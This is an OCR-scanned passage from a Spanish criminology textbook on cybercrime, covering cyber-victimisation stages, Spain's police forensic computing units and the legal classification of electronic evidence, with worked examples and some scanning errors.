sea esta un simple cortafuegos, un breve examen de la barra de navegación,
etc., es decir, no depende de ningún ente externo a ella misma. En este senti-
do, se asemeja al denominado deber de autotutela, hasta hace poco relativa-
mente utilizado en los delitos de estafa tradicionales, destacando un pseudo
deber, por parte de la víctima, de obstaculizar o prever el elemento típico del
engaño "bastante" desplegado por el estafador. Ahora bien, lo que en aparien-
cia y hasta cierto punto puede ser sencillo de refutar tras comprobar ciertos
aspectos de un burdo intento de estafa, por ejemplo, reaparece como algo
francamente delicado cuando lo aplicamos a la cibervíctima, porque la infor-
mación acerca de los medios tecnológicos de que dispone suele ser escasa
cuando no inexistente, es decir, el simple hecho de ser usuario de la Red no
le convierte en un experto, ni tan siquiera en un aprendiz de hacker. La deno-
minada estafa informática tipificada en el art. 248.2 a), b) y c) CP representa,

4 "Acción de prevención ante los secuestros virtuales". Policía Nacional, Oficina Virtual.
Disponible en: https: / /www.policia.es/ actualidad/pre_secuestros_ virt. html

- 118 -
Capítulo 3. PARTICULARJDADES DE LA CRIMIN AD LACIONADA CON LAS TIC

en la actualidad, el mayor aumento en núm ro d iberdelitos y, por ende, su


prevalencia en el mundo de la criminaHd d quivale a un porcentaje mucho
más elevado de cibervíctimas que las provocadas por otros ciberdelitos. Este
factor apuntado deriva de la participación masiva de sujetos en operaciones
de compraventa a través de portales específicos, como e-Bay, etc., y todo tipo
de contratación de servicios.
Ej. 3.13: Natalia es usuaria de Facebook y Twitter, en ambos casos a
través de cuentas abiertas, esto es, cualquier otro cibernauta puede ac-
ceder a su perfil. A pesar de que la gestión de la privacidad de su perfil y
de la seguridad de sus datos en Internet le compete, y a sabiendas de que
todo lo que publique es susceptible de ser leído o visualizado, no toma
ninguna medida de prevención frente al resto de potenciales usuarios.
Como no quiere agotar el crédito de datos contratado por mensualida-
des y proporcionado por su proveedor de servicios, acude diariamente
a un punto cercano a su domicilio para conectarse a dichas RRSS desde
un ordenador público (que utilizan más usuarios) en un locutorio con
acceso a Internet. Además, cuando se marcha, abandona las pantallas del
ordenador utilizado, aunque por pereza, jamás cierra las sesiones ini-
ciadas en los respectivos sitios web. Como vemos, la similitud entre este
ejemplo y el proporcionado en páginas anteriores respecto a la conducta
de no cerrar la puerta del domicilio físico y la posibilidad de sufrir un
robo cuando uno se ausenta del mismo, es paradigmática.

La prevención derivada (por derivación) es aquella potencialmente ges-


tionada o directamente ejercida por entes o sujetos externos al ámbito de
control de la víctima y que.junto a ella, pueden convertirse en víctimas al uní-
sono, es decir, el ataque a la víctima primaria desemboca en la victimización
de la víctima derivada, el ente responsable del control o el ente prestador de
servicios de Internet. Con la salvedad de no ser este el lugar idóneo para desa-
rrollar este aspecto concreto, no podemos dejar de mencionar la importancia
que comportan estos supuestos en el análisis de los delitos omisivos, pues el
ente gestor responsable del control, ante determinados acontecimientos, os-
tentaría una posición de garante respecto de la víctima primaria.
Ej. 3.14: Natalia es usuaria de Facebook e Instagram, pero su perfil perso-
nal está limitado a 800 amigos (Facebook, en concreto, posee un algoritmo que
determina la relevancia del contenido para cada uno de sus seguidores y sola-
mente lo muestra a aquellos que cree que puede interesarle ). En 2018, Face-
book sufrió un ataque y 50 millones de cuentas fueron hackeadas, entre ellas la
de Natalia. También resultó afectada su cuenta en Jnstagram, al ser esta una red

- 119 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

subsidiaría de Facebook. Los hackers se aprovecharon de una debilidad en el có-


digo introducida enjulio de 2017 en una nueva funcionalidad de vídeo. A través
de una combinación imprevista de errores en el código de Facebook (vulnerabi-
lidad explotada -ver Capítulo 1), los atacantes accedieron a las llaves internas-
token (son las que permiten que Facebook recuerde los datos del usuario, sin
necesidad de introducir la contraseña cada vez que se accede a la aplicación).

6. El proceso de victimización

Así corno anteriormente estudiarnos la huella de la prevención en el es-


cenario de la cibervictirnología, abordarnos ahora el camino que la víctima
transita desde el momento en que podernos considerar atacado cualquier bien
jurídico por el uso de las TIC (recordemos que una buena parte de los delitos
tradicionales encuentran ahora en la red un nuevo medio cornisivo), hasta que
podamos afirmar que el proceso de victirnización ha concluido. Más allá de las
tipologías y los modelos teóricos de la victirnización, de acuerdo con GARcfA-
PABLOS (2016), la victimización corno fenómeno general, es un proceso por el
que un sujeto experimenta las consecuencias negativas de un hecho dramático
tipificado corno delito y puede estudiarse desde un enfoque doble:
Atendiendo al hecho y a las variables que influyen en su manifesta-
ción, en cuyo caso hablarnos de "riesgo de victirnización".
Atendiendo a los efectos e impactos en la persona que los sufre, en
cuyo caso hablarnos de "vulnerabilidad de la víctima concreta" 5 •
Ej. 3.15: En los dos ejemplos anteriores, podemos afirmar que Natalia su-
fre un determinado riesgo de victimización por el mero hecho de ser usuraria
de RRSS; al mismo tiempo, podemos analizar la vulnerabilidad de Natalia por el
uso concreto (defectuoso o adecuado) que haga de las RRSS.

Al margen de las numerosas clasificaciones o formas de victirnización


desarrolladas en la evolución del concepto de víctima como objeto de estudio
de la Criminología, distinguiremos cuatro arquetipos esenciales. No sin antes
advertir que, en definitiva, la victirnización es un proceso heterogéneo en el
que confluyen diferentes factores, de índole objetivo y subjetivo. Los tres pri-
meros niveles en el proceso de victirnización se corresponden con las etapas

5 En relación con la multitud de variables presentes en los procesos de victimización


relacionados con el sexting, el ciberacoso, o las actividades cotidianas, sobre todo por parte de
los jóvenes en Internet, véase el monográfico "Ciberdelincuencia y Cibervictimización" (2016).
Tamarit Sumalla, Josep Maria, IDP: Revista d 'Internet, dret i política, Núm. 22. Disponible en:
https://www.raco.cat/ index.php/ IDP/ article/ view / 318359/ 408476 [Consulta: 10-07-19]

- 120 -
descritas en el ámbito de la Victimología tradicional (GARCfA- PABLOS, 2016;TA-
MARIT SUMALLA, 2006), pero la especial significación de la víctima en la cibercri-
minalidad, como ya hemos visto, requiere dar un paso más en las etapas ge-
nerales y comúnmente aceptadas, agregando un cuarto nivel específicamente
aplicable a la cibervíctima, que por supuesto no es excluyente de la función
que puedan cumplir los tres primarios, tanto en el espacio físico como en el
cibernético, y que conviene recordar brevemente:
1) Victimizacíón primaria: proceso por el cual el sujeto sufre, directa
o indirectamente, los efectos nocivos (bien sean materiales o psíquicos) de-
rivados del delito o hecho traumático. En este nivel, el agente principal que
desencadena el proceso de victimización es el victimario.
Ej. 3.16: Por ejemplo, trastornos de estrés postraumático, sensación de in-
defensión, depres ión, miedo e inseguridad ante la posibilidad de ser nuevamen-
te víctima de un delito, etc.

2) Victimizacíón secundaria (también denominada victimización pro-


cesal): proceso por el cual el sujeto sufre los costes (personales) derivados de
la intervención del sistema legal ante la investigación, persecución y enjuicia-
miento de un hecho delictivo. En este nivel, el agente principal en el proceso
de victimización es el sistema legal.
Ej. 3.17: Por ejemplo, la reconstrucción de la escena de l deliro, el someti-
miento a exp loraciones médico-forenses, el reencuentro con el victimario en la
fase de juicio oral, etc.

3) Victimizacíón terciaria: el proceso reuniría los costes de la penali-


zación soportada personalmente o por terceros, así como los costes sufridos
por la víctima de manera colateral o indirecta (en el caso del ciberdelito, por
ejemplo, a través de la insistente presencia de la imagen de la víctima en me-
dios digitales, RRSS, etc.) o la propia construcción de identidad de la víctima
en torno a los distintos niveles de la victimización sufrida (ya sea primaria o
secundaria). Esta categoría es la que permanece menos definida y no ha lo-
grado un consenso conceptual entre los distintos autores, aunque aquí adop-
tamos la perspectiva mixta que siguen tanto GARCfA-PABLOs (2016) como TAMA-
RIT SUMALLA (2006), que relacionan este tipo de victimización con la reacción
social comunitaria ante el delito (si socialmente se castiga o no, cómo experi-
menta y cómo repercute en la víctima dicho castigo). En este nivel, el agente
principal en el proceso de victimización es la comunidad.
Ej. 3.18: Por ejemplo, imágenes televisivas o en la Red, errores judiciales,
prisión provisional injustificada, la denominada pena de banquillo, etc.

- 121 -
Cibercriminalidad.
Segunda pai; , A PECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Revictimización latente (MARTfNEZ FRANCISCO, 2018): Se caracteriza


por dos notas esenciales: la perpetuidad de los datos en el ciberespacio y la
incertidumbre de la víctima respecto al resurgimiento de esos datos. El moti-
vo es que el ataque al bien jurídico puede perpetuarse en el tiempo y reapa-
recer de manera súbita en cualquier momento, con independencia de que se
haya logrado el borrado de los datos de la víctima en la Red (el denominado
derecho al olvido). Tan pronto como un contenido llega a una web, se convier-
te en objeto de propiedad pública y cualquiera puede ver, compartir, alma-
cenar o alterar los datos. La información en el ciberespacio es incontrolable
y actualmente no existen herramientas para eliminar de una vez por todas
dicha información porque, tras cargar un contenido en Internet, la primera
descarga marca un punto de no retorno (el ciclo de vida de los datos nunca
se agota, la víctima desconoce cuándo y dónde puede volver a surgir). En este
nivel, el agente principal en el proceso de revictimización es el propio ecosis-
tema digital (la Red), y el Derecho penal no tiene en cuenta la posibilidad de
revictimización en el futuro, es decir, la repetición del impacto criminal en
la víctima causada por la incapacidad de borrar información que afecte a su
persona en el ciberespacio.
Ej. 3.19: En 2011, la conocida actriz Scarlett Johansson sufrió una intromi-
sión ilícita en el sistema operativo de su teléfono móvil, los hackers anunciaron
que habían robado unas instantáneas en las que la actriz aparecería desnuda o
en situaciones íntimas. Las fotografías íntegras fueron publicadas en decenas
de páginas sobre "celebrities". Con independencia de que los piratas cibernéti-
cos fueran capturados y puestos a disposición judicial. asegurarse de que todas
las imágenes ilícitas sean retiradas de todos los sitios que las publicaron es un
reto inabarcable e interminable (de hecho, la noticia y algunas de las instantá-
neas siguen apareciendo tras una burda búsqueda), y además cualquiera que
haya accedido a las imágenes antes de ser retiradas, puede conservar una copia
y ponerlas de nuevo en circulación en un futuro .

Ej. 3.20: En España, en mayo de 2019, se produjo el suicidio de una mu -


jer tras la difusión masiva, por WhatsApp y sin autorización, de un video sexual
protagonizado por ella misma, entre sus compañeros de trabajo, trascurridos
más de 5 años desde su grabación. En este caso, la víctima no interpuso denun-
cia, por Jo que ni el autor de la primera difusión, ni los que llevaron a cabo suce-
sivas redifusiones podrán ser imputados por el delito de sexting. En todo caso,
los hechos podrían ser perseguidos por ser constitutivos de un delito contra la
integridad moral o de extorsión sexual al ser delitos perseguibles de oficio que
no requieren la denuncia del agraviado.

Algunos autores como JUNGER et al. (2017) sugieren otra categoría dentro
del proceso de cibervictimización, la denominada "victimización múltiple"

- 122 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINALIDAD RELACIONADA CON LAS TIC

(multiple victimization). El argumento es interesante y sólido, pero no mere-


ce, en nuestra opinión, un encaje autónomo en la tipología que acabamos de
describir porque se trata de un fenómeno aleatorio que también se produce
en el mundo físico. La victimización múltiple consiste básicamente en agre-
gar las sucesivas conductas (criminales) derivadas del ciberdelito originario
para conformar una especie de ciberdelito en cadena (crime chain) referido a
una misma cibervíctima, pero resulta que sucede exactamente lo mismo en la
criminalidad del mundo físico.
Ej. 3.21: Por ejemplo, el phishing o el hackin9 son un paso previo para ro-
bar la identidad o los datos de alguien con el fin de apropiarse después de una
cantidad de dinero de su cuenta bancaria, otras veces los sitios web pueden ser
atacados repetidamente, etc.

Entre un delito contra la propiedad (p. ej., un robo - el delito origina-


rio) y sucesivos delitos de naturaleza personal (producir lesiones a la víctima
para llevar a cabo el robo o para abandonar el lugar con lo robado; privar de
libertad a la víctima durante horas para asegurarse una huida segura; el ho-
micidio del propietario que descubre al ladrón infraganti, etc., no encontra-
mos una diferencia sustancial con la idea de la victimización múltiple en el ci-
berespacio. En todo caso, esta idea de la victimización múltiple o repetida no
hay que confundirla con la profusión de víctimas diferentes que una misma
conducta cibercriminal puede desencadenar, en cuyo caso nos encontramos
ante supuestos de multiplicidad de víctimas o macro-victimización.

IV. LA PRUEBA EN EL CIBERCRIMEN

l. La informática forense

La evidencia fundamental en los procesos penales que enjuician los ci-


bercrímenes es la prueba electrónica. El estudio de este tipo de prueba co-
rresponde a la Criminalística y a las denominadas Ciencias Forenses, mientras
que su interpretación en conjunto con el resto de las evidencias aportadas al
proceso, la valoración del contexto del fenómeno criminal, el ciberdelincuen-
te y su víctima es tarea del criminólogo.
Al igual que en muchos de los países de nuestro entorno, el tratamiento
e investigación de la prueba electrónica en España corresponde a la policía
científica. Dentro de la Comisaría General de Policía Científica, se ha creado
una Unidad Central de Criminalística y, a su vez, dentro del Servicio de Técni-

- 123 -
Cibercriminalidad.
und port 'ASPECTOS PENALES y CRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

ca Policial se encuentra la sección de informática forense, ciencia forense a la


que corresponde el estudio de la prueba electrónica.
Asimismo, también cabe destacar la labor del Grupo de Delitos Telemá-
ticos de la Unidad Central Operativa de la Guardia Civil (GDT), que fue creado
para investigar todos aquellos delitos que se cometen a través de Internet6.
Para la investigación de esta clase de cibercrímenes el GDT se apoya en los
Equipos de Investigación Tecnológica (EDITEs) establecidos en cada una de
las provincias de España.
En materia de informática forense es competente el Servicio de Crimina-
lística (SECRIM) de la Guardia Civil, que se encuadra en la Jefatura de Policía
Judicial y depende de la Dirección Adjunta Operativa. El SECRIM cuenta con
un Departamento de Ingeniería, cuyo ámbito de estudio es el de la ingeniería
y las nuevas tecnologías. Dentro de sus áreas especializadas se encuentran
las de Informática y Electrónica. El área de Informática analiza evidencias
digitales tales como ordenadores, discos duros, etc. en busca de archivos o
restos de información borrada o encriptada. Finalmente, el área de Electró-
nica se centra en el estudio de dispositivos electrónicos tales como teléfonos
móviles, smartphones y tablets.
La informática forense es una disciplina auxiliar al servicio de la Justi-
cia, cuyo principal objetivo es enfrentar los desafíos y técnicas utilizadas por
los hackers, y servir como garante de la veracidad de la evidencia digital en
un proceso. Existen diferentes acepciones y terminologías para definir la in-
formática forense y sus especialidades, tales como computer forensics (com-
putación forense o informática forense en sentido estricto), digitalforensics
(forensía digital o informática forense en sentido amplio), networkforensics
(forensia en redes), etc. (CANo, 2009; R:rco BAUTISTA & RUEDA RUEDA, 2016) . Todos
estos términos hacen alusión a un determinado enfoque científico que apro-
vecha efectos electromagnéticos y otras técnicas para "recolectar, analizar,
verificar y validar todo tipo de información existente, o información que se
considerada como borrada" (ARIAS CHAVES, 2006). En nuestro país, sin embar-
go, se utiliza con carácter general la expresión de informática forense, que
se define como "la ciencia de adquirir, preservar, obtener y presentar datos
que han sido procesados electrónicamente y guardados en un medio electró-
nico (evidencia digital), teniendo su fundamento en las leyes de la física, de
la electricidad y el magnetismo". El soporte informático guarda información,
incorporada mediante procesos electromagnéticos. Estos fenómenos electro-
magnéticos permiten que la información se pueda almacenar, leer e incluso

6 https://www.gdt.guardiacivil.es/ webgdt/home_alerta.php

- 124 -
Capítulo 3. PARTICULARIDADES DE LA CRIMIN LI A LACIONADA CON LAS TIC

recuperar cuando se creía eliminada (LLORENTB VEGA, 2011). Se trata, en suma,


de un proceso metodológico para la recogida y análisis de los datos digitales
de un sistema de dispositivos, de forma que pueda ser presentado y admitido
ante los tribunales (RODRÍGUEZ & DoMÉNECH).
Una corriente eléctrica crea un campo magnético, existiendo materiales que
se magnetizan con facilidad cuando son expuestos a un campo magnético débil,
otros en los que la resistencia eléctrica cambia cuando el material es magnetizado
regresando a su valor original cuando el campo magnetizante es apagado (Magne-
to-Resistencia o efecto MR) y finalmente aquellos que se magnetizan con dificultad
requiriendo un campo magnético fuerte manteniendo su magnetización cuando
el campo se apaga. Estos cuatro fenómenos son explotados por los fabricantes de
cabezas grabadoras magnéticas, que leen y escriben datos, para almacenar y recu-
perar datos en unidades de disco, de cinta y otros dispositivos de almacenamiento
magnético 7.

No obstante, hay que tener en cuenta que el análisis forense no se basa


exclusivamente en esta clase de fenómenos electromagnéticos, puesto que
para un adecuado análisis de la información digital es preciso conocer el pro-
ceso de escritura en los medios físicos (formateas incluidos). Es necesario
comprender que no es que la información se haya borrado físicamente y se
pueda recuperar con tecnología a través de estos efectos electromagnéticos,
sino que realmente no se han borrado físicamente, aunque sí a nivel lógico
(por ejemplo, las referencias a ellos en la estructura de directorios ha sido
removida y el espacio que estos ocupan se hace disponible para su posterior
sobre-escritura). Si el borrado se hubiera producido realmente de forma fí-
sica, no sería posible recuperar los datos. Por tanto, aunque algunas técnicas
forenses se basan en los mencionados efectos electromagnéticos, actualmen-
te existen múltiples métodos y herramientas para la recuperación de datos
que dependerán del caso concreto: software especializado, reparación de
hardware, etc.
3.22. Así, no podrá utilizarse la misma técnica forense en diferentes esce-
narios de recuperación de datos: para la recuperación de datos en un sistema
operativo podrá utilizarse un software especializado (como un Live CD) como
med io para acceder al sistema de archivos y obtener una copia; en otros su-
puestos, será necesario reparar el sistema de archivos, la tabla de particiones o
el registro maestro de cargado (MBR); también podrán utilizarse técnicas ele re-
cuperación del disco duro que van desde la recuperación basada en software de
los datos corruptos a el reemplazo del hardware de un disco dañado físicamen -
te. Existen algunas herramientas informáticas para la recuperación de archivos

7 https: / /www.seguridadpublica.es/ 201 O/ 12/ informatica-f orense-generalidades-as-


pectos-tecnicos-y-herramientas/

- 125 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

propias de la informática forense, tales como EnCase, Foremost, Forensic Toolkit,


Open Computer Forensics Architecture, The Coroner's Too/kit, The Sleuth Kit, o M3
Bit/ocker Recovery.

Si bien no se tiene constancia del primer informe pericial que aplicó los
rudimentos de la informática forense, la historia de esta ciencia comienza en
EE.UU. a comienzos de los años 90, promovida por el FBI, dando como resul-
tado la creación de la IOCE (International Organization of Computer Eviden-
ce ), a finales de los años 90, con la intención de compartir información sobre
las prácticas de informática forense en todo el mundo.
El origen del Grupo de Delitos Telemáticos de la Guardia Civil se remon-
ta al año 1996, cuando se constituyó el Grupo de Delitos Informáticos (GDI),
antecedente del actual GDT, para atender a las pocas denuncias que había en-
tonces por los llamados delitos informáticos.
En España, las primeras pericias electrónicas comienzan a practicarse
en 1998, formándose un Grupo de Pericias Informáticas que, en el año 2008,
pasa a tener el nivel de Sección.
Durante el primer semestre de 2009 se crean Grupos de Pericias Informáticas
en las Jefaturas de Oviedo, Santander, Granada, Islas Baleares, Aragón, la Comisaría
Provincial de Málaga, y la Comisaría Local de Vigo.

En el año 2010 se creó la especialidad de Informática Forense en sus co-


rrespondientes Brigadas Provinciales de Policía Científica.
Ej. 3.23: En el año 1998 se produce la primera solicitud de informe pericial
de material informático por parte del Juzgado Central de Instrucción n.º 5 de la
Audiencia Nacional, donde se solícita a la policía científica que realice un análi-
sis de material intervenido por un presunto delito de malversación de caudales
públicos y defraudación. Esta petición dio lugar a la elaboración de un informe
pericial de cuatro servidores informáticos.

2. La prueba electrónica

El concepto de prueba electrónica, conocida también como prueba digi-


tal, prueba tecnológica, prueba informática o ePrueba, no ha sido definido de
forma pacífica por parte de nuestra doctrina procesal. Entre las definiciones
más aceptadas se encuentran las que lo conceptúan como cualquier prueba
presentada informáticamente y que estaría compuesta por dos elementos
(BUENO MATA; DE URBANO CASTRILLO, 2008 y 2009):

- 126 -
Capftulo 3. PARTICULARIDADES DE LA CRlMINA AD LACIONADA CON LAS TIC

■ Soporte material o hardware: la p arte física y visible de la prueba


para cualquier usuario.
Ej. 3.24: Por ejemplo, un elemento material de la prueba electrónica lo
puede constituir la carcasa de un Smartphone, el propio dispositivo físico ele un
laptop o una memoria USB.

■ Elemento intangible, datos virtuales o software: metadatos y archi-


vos electrónicos modulados a través de unas interfaces informáticas.
Ej. 3.25: Pueden considerarse elementos intangibles de la prueba electró-
nica los sistemas operativos de los ordenadores o de los teléfonos móviles (An-
droid, Linux, Winciows, etc.), así como los datos que se encuentran almacenados
en ellos (imágenes, archivos de texto, etc.).

Teniendo en cuenta estos dos aspectos, puede diferenciarse entre los


conceptos de "fuente de la prueba", núcleo de la actividad probatoria, siendo
esta la información digital que se encuentra contenida en el soporte físico;
y, por otro lado, el "medio de prueba", que se define como la forma concreta
a través de la cual esa información entra en el proceso. A diferencia de otras
pruebas, en la evidencia electrónica no existe una identidad plena entre el
contenido (los datos digitales) y el continente (el soporte físico).
Ej. 3.26: La fuente de la prueba en un proceso penal que investiga un po-
sible delito de financiación ilegal de un partido político son los datos informáti-
cos relativos a las operaciones económicas, como, por ejemplo, la información
relativa a las donaciones de empresas. Como medio de prueba, sin embargo,
esta información puede estar contenida en diferentes soportes, como tipos de
archivo de texto, hojas de cálculo, en un disco duro o en un pendrive. Los datos
contenidos en un archivo informático se conservan en un sistema de encripta -
do binario; sin embargo, si imprimirnos el documento la información qu edará
plasmada en forma de escritura en un soporte de papel. Gracias a este medio
concreto, podrá practicarse la prueba ante la autoridad judicial.

Así, por prueba electrónica cabe entender toda información de valor


probatorio contenida en un medio electrónico (SANcH1s CRESPO, 2012) o trans-
mitida por dicho medio (DELGADO MARTÍN, 2013 y 2017). Que la información
tenga valor probatorio significa que es susceptible de aportar mayor claridad
y convicción para el juzgador competente en la instrucción o enjuiciamiento
de unos posibles hechos delictivos, lo que supone que la información debe
poder ser extraída y reproducida enjuicio a través de un informe pericial. Así,
se considerarán evidencias informáticas de interés aquellas que contengan
información del usuario del dispositivo a analizar, y no meramente informa-
ción destinada a tareas o funciones necesarias para la máquina.

- 127 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

Continuando con la anterior definición podemos encontrar los siguien-


tes elementos:
• Información en sentido amplio: un soporte electrónico puede conte-
ner cualquier tipo de información o "datos informáticos".
• Que sea producida, almacenada o transmitida por medios electró-
nicos. El elemento esencial de este tipo de prueba es su naturaleza
"electrónica", es decir, que utiliza un "lenguaje binario a través de un
sistema que trasforma impulsos o estímulos eléctricos o fotosensi-
bles y, por cuya descomposición y recomposición informática gra-
bada en un formato electrónico, genera y almacena la información.
Dicho lenguaje es un código ininteligible para aquéllos que no son
informáticos. La visualización del texto en pantalla es una traducción
en lenguaje alfabético común, descodificado" (DELGADO MARTÍN, 2013
y 2017) .
• Que sea idóneo para acreditar hechos en un procedimiento judicial,
que en el caso que aquí nos interesa, se desarrolle con motivo de la
investigación y enjuiciamiento de delitos en un sentido amplio y, es-
pecial pero no únicamente, delitos informáticos.
En cuanto a su naturaleza jurídica concreta, la prueba electrónica es con-
siderada normalmente como prueba documental (DE URBANO CASTRILLO, 2008 y
2009; FERNANDEZ RODERA, 2015), si bien algunos autores acertadamente entien-
den que también puede ser conceptualizarse como prueba pericial (cientí-
fica) e, incluso, como prueba testifical mediante el testimonio de la persona
que ha tenido contacto con el dispositivo electrónico (DELGADO MARríN, 2013,
2016 y 2017; VELASCO NUÑEZ, 2006; MESTRE DELGADO, 2015).
Ej. 3.27: Por prueba documental se entiende toda aquella que se encuentra
contenida en un documento. En el caso de la prueba electrónica, por ejemplo,
un documento electrónico como un CD (SAN, de 25 de abril de 2008). La prueba
pericial es aquella que para su comprensión o reproducción en un proceso re-
quiere de unos conocimientos técnicos de los que la autoridad judicial carece,
teniendo el adjetivo de científica cuando reúna los requisitos de controlabilí -
dad, falsabilidad (posibilidad de refutar, esto es, la posibilidad ele ser sometida
a potenciales pruebas que la contradigan) y la técnica metodológica científica.
La prueba pericial requiere la aportación a la causa de un informe técnico. Fi-
nalmente, la prueba testifical es aquella que versa sobre las declaraciones de
un sujeto -el testigo- en el proceso, sometidas a la obligación de decir la verdad
-obligación que, por otra parte, no tienen otros actores procesales, como el en-
causado- bajo amenaza de conminación penal (delito de falso testimonio) (SAP
Barcelona, 29 de julio de 2011).

- 128 -
Capítulo 3. PARTICULARIDADES DE LA CRIMINAIJDAD RELACIONADA CON LAS TIC

3. Tipos de prueba electrónica

3.1. Posibles clasificaciones


En cuanto a la tipología de la prueba electrónica, se distinguen dos mo-
dalidades generales (ARMENTA DEu, 2018):
• Los datos o informaciones almacenados en un dispositivo electróni-
co.
• Los transmitidos por redes de comunicación abiertas o restringidas
como Internet, telefonía fija y móvil u otras.
Otra posible clasificación es la que alude al tipo de soporte concreto que
constituye la evidencia tecnológica, digital o electrónica. Así, se diferencia en-
tre (DELGADO MARTíN, 2016 y 2017):
• Soportes Informáticos: soportes portátiles, que son los que disponen
de una carcasa que permite su traslado garantizando la integridad de
la información en ellos contenida.
Ej. 3.28: Disquetes CD o DVD, soportes de memoria del tipo compact.f7ash,
memory stick, SD card, XD card y sus variantes del tipo micro o dúo y dispos.iti -
vos USB (pendrive. MP3, MP4, iPod o discos duros externos o firewire.

También entran dentro de este grupo los soportes contenidos en equi-


pos portátiles o sobremesa.
Ej. 3.29: Discos dw-os ubicados en el interior de equipos informáticos, dis-
cos duros de tipo IDE. SCSI o SKfA en sus distintos tamaños de 3,5 pulgadas, 2.5
pulgadas y 1,8 pulgadas o microdrive. En este tipo también podrían incluirse
dispositivos del tipo PDA o PALM.

• Terminales de telefonía móvil: memoria interna del teléfono y tarjeta


SIM
• Dispositivos electrónicos: cualquier dispositivo electrónico capaz de
almacenar información.
Ej. 3.30: Skimmers usados en la falsificación de tarjetas, tarjetas de televi-
sión de pago, etc.

- 129 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

3.2. Los medios de prueba electrónica más comunes

Uno de los principales medios de prueba electrónica serán los soportes


audiovisuales e informáticos englobados en el concepto de documento elec-
trónico, el cual necesita de la aplicación de un programa o código concreto
para su lectura.
Es un error considerar documento electrónico como sinónimo de prueba
electrónica cuando es solo una de las distintas modalidades de pruebas electró-
nicas (BoRGES BLAzQUEZ, 2018). La primera definición de documento electrónico
en España se encuentra en el art. 3.5 de la Ley 59 /2003, de 19 de diciembre, de
firma electrónica: se considera documento electrónico la información de cual-
quier naturaleza en forma electrónica, archivada en un soporte electrónico se-
gún un formato determinado y susceptible de identificación y tratamiento di-
ferenciado. Asimismo, en el art. 26 de nuestro vigente Código penal se explicita
que en el orden jurídico penal se considera documento todo soporte material
que exprese o incorpore datos, hechos o narraciones con eficacia probatoria o
cualquier otro tipo de relevancia jurídica. Esta previsión legislativa incluye, por
tanto, también los documentos electrónicos en otros soportes digitales.
Otro de los tipos de prueba electrónica más comunes son los e-maíls o
correos electrónicos (ARMENTA Dw, 2018; DELGADO MARTÍN, 2016 y 2017), en el
que lo importante será tanto el contenido del mensaje y anexos (texto, ima-
gen, video enviado a través de una red de telecomunicaciones) como los datos
de tráfico. La acreditación de esta prueba puede realizarse a través de cual-
quier dispositivo electrónico que haya participado en su emisión o recepción,
así como en los servidores implicados.
En el caso del spam, el receptor deberá buscar una dirección de correo
electrónico y enviar un mensaje manifestando el deseo de opting out (soli-
citud de no envío de nuevos correos publicitarios), que constituirá prueba
suficiente para presentar una demanda o denuncia en el supuesto de nuevo
envío de correo no deseado. El correo de opting out constituirá un documento
electrónico que tiene validez jurídica y, por lo tanto, será suficiente para im-
pedir el envío de comunicaciones no solicitadas (DrNis & ALMEIDA, 2017).
Con el auge de las nuevas apps de mensajería instantánea multiplatafor-
ma (IOS, Wíndows, Androíd), WhatsApp o Telegram se han convertido en fuen-
tes de prueba habituales en los juzgados españoles (STS 342/2013, de 17 de
abril) . Tienen la particularidad de que la información transmitida no siempre
se conserva de manera indefinida en un servidor externo, sino que se utilizan
protocolos de seguridad y cifrado de la información. Aunque la cuestión téc-
nicamente es más compleja y discutible, lo cierto es que nuestros tribunales

- 130 -
Capftulo 3. PARTICULARIDADES DE LA CRIMINALIDAD RELACIONADA CON LAS TIC

afirman que, como el contenido no siempre queda almacenado en el servi-


dor del administrador, la autoridad judicial no podrá solicitar a la empresa
prestadora del servicio que certifique el contenido de los mensajes, debiendo
acudir a los dispositivos electrónicos usados en la conversación. Los datos
de tráfico (origen y destino, ruta, hora, tamaño y duración), sin embargo, si
pueden ser reclamados a la empresa operadora. También será importante la
extracción de los datos contenidos en las memorias SD que muchos de estos
dispositivos tienen en su interior.
Las denominadas redes sociales y elementos web también son fuentes
y medios de prueba relevantes en los procedimientos. La prueba electrónica
basada en las redes sociales se centra en la lista de interrelaciones conteni-
das en el perfil de un usuario, así como en las propias confesiones o pruebas
de comisión de hechos delictivos. Cuestiones como la huella o rastro digital
del usuario, la autoría o titularidad de la cuenta (dirección IP), la localización
del dispositivo y la información que pueda proveer la empresa prestadora de
servicios (datos de identificación) serán importantes. Por otra parte, la infor-
mación pública subida por el propio usuario para compartir con los demás
clientes de la red social no se considerará amparada por el secreto a las co-
municaciones y, por tanto, no requerirá de autorización judicial.
En cuanto a la prueba pericial videográfica, es aquella modalidad de pe-
ricia que se practica en un punto determinado, distinto de la Sala de Vistas del
Juzgado o Tribunal, ante la cual se visualiza, mediante una comunicación en
tiempo real de imagen y sonido, permitiendo participar a las partes procesa-
les. Requiere de una adecuada preparación de la prueba, con sala específica
equipada para la reproducción, comprobaciones de las prestaciones técnicas
de origen, personal de mantenimiento y aseguramiento de la identidad de
quien intervenga (DE URBANO CASTRILLO, 2004).
Uno de los principales medios de prueba electrónica serán los soportes
audiovisuales e informáticos englobados en el concepto de documento electró-
nico, el cual necesita de la aplicación de un programa o código concreto para su
lectura. Sin embargo, como ya hemos advertido, es un error considerar docu-
mento electrónico como sinónimo de prueba electrónica cuando es solo una de
las distintas modalidades de pruebas electrónicas (BoRGES BLAzomz, 2018).
Finalmente, otras fuentes o medios de prueba que requieren de cono-
cimientos técnicos y una exquisita manipulación de los soportes y los datos
en ellos contenidos serán los denominados dispositivos de almacenamiento
masivo de datos (PORTAL MANRUBIA, 2019). Especialmente problemática es la
prueba basada en el denominado cloud computing, modelo de prestación de
servicios desarrollado por las empresas vinculadas a Internet que consiste en

- 131 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

